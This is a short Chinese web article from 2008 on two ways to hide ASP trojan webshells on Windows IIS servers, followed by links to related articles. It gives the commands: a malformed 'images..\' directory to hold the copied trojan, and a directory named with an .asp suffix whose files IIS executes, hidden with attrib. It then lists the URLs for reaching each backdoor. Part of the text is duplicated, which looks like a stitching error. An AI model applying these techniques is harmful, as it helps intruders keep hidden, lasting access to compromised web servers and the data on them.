隐藏ASP木马后门的两种方法
更新时间:2008年06月04日 08:22:34 作者:
下面的两种方法可以将你的asp木马隐藏,大家可以测试下
1、建立非标准目录:mkdir images..\
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马:http://ip/images../news.asp?action=login
如何删除非标准目录:rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容:
新建12.jpg文件内容: 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马:http://ip/images../news.asp?action=login
如何删除非标准目录:rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容:
新建12.jpg文件内容: 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
相关文章
判断上传文件中是否存在危险代码2009-11-11
本文主要介绍了修改三个组件来达到防范asp木马攻击,需要的朋友可以参考下2015-09-09
实例分析ASP上传漏洞入侵实战及扩展...2006-09-09
在MsSql、Access两种数据库中插入记录后马上得到自动编号的ID值
在MsSql、Access两种数据库中插入记录后马上得到自动编号的ID值...2006-07-07
也谈跨站脚本攻击与防御...2006-07-07
一直很奇怪,为什么客户端里面不是eval,就是execute,不管我藏哪里,管理员用个什么XX webshell扫描器,就能踢我屁股了。2010-10-10
用asp实现的iframe批量替换工具...2007-09-09
有时候通过程序上传木马,一般都是伪装成图片,下面是asp下检测图片木马的代码,需要的朋友可以参考下2015-09-09
最近网上一个朋友的网站被天天挂马,知不知道这位同志的坚持不懈的精神,应该用在什么地方,现在的人啊2008-07-07
新型ASP后门源代码分析...2007-01-01
最新评论